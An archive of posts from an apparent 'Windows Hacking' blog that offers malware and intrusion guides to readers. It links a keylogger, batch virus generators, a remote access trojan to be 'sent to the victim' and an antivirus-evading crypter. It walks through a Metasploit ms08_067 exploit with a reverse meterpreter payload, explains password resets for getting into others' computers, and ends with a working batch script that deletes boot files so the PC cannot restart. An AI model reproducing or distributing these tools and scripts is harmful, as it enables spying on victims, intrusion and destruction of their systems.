Showing posts with label Windows Hacking. Show all posts
Showing posts with label Windows Hacking. Show all posts

Friday, July 18, 2014



Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts.

Download here (Linux Users):

Click Here To Download

Download here (Windows Users):

Click Here To Download

Tuesday, June 24, 2014



Vic Spy Keylogger is a simple keylogger program which records keystrokes and all the computer activity of the user on whose computer it is installed. There is no need to install it, it runs immediately after extraction from archive. 

 
Password: hackingguide

Sunday, February 2, 2014

Hack Administrative pass

This is a short and effective way to recovery your Windows Login password without knowing the previous password. This trick works only in case you are already logged into Windows and you have all the administrative privileges. So here we go:
1.Open Command prompt
START>RUN
password Recovery
Type in; cmd

2. In command prompt just type in “net user” as shown below:

3.After doing the above, the command will give you all the account’s names>
password recovery
4. So the next thing you do is just type in: net user YourUser NewPass
password recovery
…now just log off from Windows and try to log back in with your new password

This post will show you how to hack Windows administrator password at times when you forget it or when you want to gain access to a computer for which you do not know the password.

Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to log in to the computer. So, if you are somewhat in a same kind of situation, here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer.

Hacking the Windows Admin Password:

You can do this with a small tool called  Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features:
  • You do not need to know the old password to set a new one.
  • This tool can detect and unlock locked or disabled out user accounts!
  • There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it Works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence, it is necessary that you boot off your computer and access this sam file via the boot menu. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.
The download link for both CD and floppy drives along with the complete instructions is given below:
It is recommended that you download the CD version of the tool since the floppy drive is outdated or doesn’t exist in today’s computer. After the download, you’ll get a bootable image which you need to burn it onto a blank CD. Now, boot your computer from this CD and follow the screen instructions to reset the password.

Another Simple Way to Reset Non-Administrator Account Passwords:

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task:
  1. Open the command prompt (Start -> Run -> type cmd -> Enter)
  2. Now type net user and hit Enter
  3. Now the system will show you a list of user accounts on the computer. Say for example, you need to reset the password of the account by name John, then do as follows:
  4. Type net user John * and hit Enter. Now, the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.
So, in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.

Monday, December 30, 2013



DELmE's Batch Virus Generator is an amazing virus creation program with lots of options to infect the victim PC such as format C: drive, delete all files, disable admin, clean registry, change home page, kill tasks, antivirus and firewall and lots more. 

Download here:  

http://www.ziddu.com/download/7051522/DELmE_sBatchVirusGeneratorv2.0.rar.html 

Password: hackingguide


This program creates batch (.bat) viruses and has varied options to ruin the victim computer in different ways. We can flood the storage space on victims' computer by making large number of files in different folders by using its "folder flood" feature. It also includes bat to exe converter to convert your batch virus files into exe virus programs and an icon changer.

Download here:

http://www.mediafire.com/download.php?ijzjmx3kd3t


Revenger is a simple and more advanced remote administration tool (RAT) which is used to access and control computers remotely . It uses client-server method for remote control and administration of computers. Just create the server and send it to the victim and you will be able to track and control every activity of the remote users.


Note : Your antivirus will detect as a HACKTOOL as it is RAT, but don't worry, it is not infected. 


Download here:  

http://www.ziddu.com/download/7012061/REVENGER.rar.html 

Password: hackingguide

Wednesday, October 30, 2013

First of all ! Dont OPEN EXECUTE File !
it will turn off your monitor and copy itself to Startup [Basic]
this codes belong to long time ago so i removed many part of it
this program only turnoff your monitor permanently until you restart your computer




Click Here To Download

What You Need To Do..
1.Backtrack
2.slave's Ip Address.
3.Payload
4.Exploit


So Let's Start With Metasploit....
Steps To Be Followed.
Step-1:-Start The Backtrack And Open the Metasploit.We Are using Simple exploit that ms08_067_netapi.That is vulnerability in Windows XP[/b]
Description:-
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

Commands-"msf:>use exploit/windows/smb/ms08_067_netapi
Step-2:-You Want to set your LHOST means where you want to your reverse connection That is localhost.msf:>set LHOST eg.192.168.1.1
Step-3:- Here You want Set RHOST Ip address to Get remote's ip address use your mind how to get it.eg.Tracing,Fake script or tracking email got it
msf:>set RHOST eg.192.168.1.100
Step-4:-After All this You want to Set Payload.Payload is the piece of software that lets you control a computer system after it’s been exploited
msf:>set PAYLOAD windows/meterpreter/reverse_tcp
[Image: XP1.png]
Now everything is Done now Just do one thing with one Command that is called.
msf:>exploit
[Image: XP2.png]
After getting meterpreter use some commands to get a system.
eg. meterpreter:>getpid (to get process id)
(to migrate process) Meterpreter:>migrate process id
And anything Like this If You want All commands do one thing
Meterpreter:>? (question mark)

DezCrypt FUD Crypter! (Fully undectable)





What Is Crypter?
Crypter is a  software used to hide our viruses, keyloggers or tools from antiviruses so that they are not detected by anti viruses. Thus, a crypter is a program that allow users to crypt the source code of their program to Bypass antivirus detection


What Does UD And FUD Mean?
UD means undetected, so only a few antivirus programs detect it. FUD means fully undetected, so no antivirus detects it

I have already given you a Free FUD Crypter which is outdated now, So today i will give you a free FUD Crypter (fully undetectable by anti viruses ) with which you can crypt any keyloggers or viruses





[Image: a.png]



The password of mediafire link is "dezired"

Download Link

Tuesday, October 29, 2013





Just copy the below code in notepad and save it as anyname.bat and when you open the file it will shutdown your computer and then you will not able to restart it

@echo off

attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Subscribe to RSS Feed Follow me on Twitter!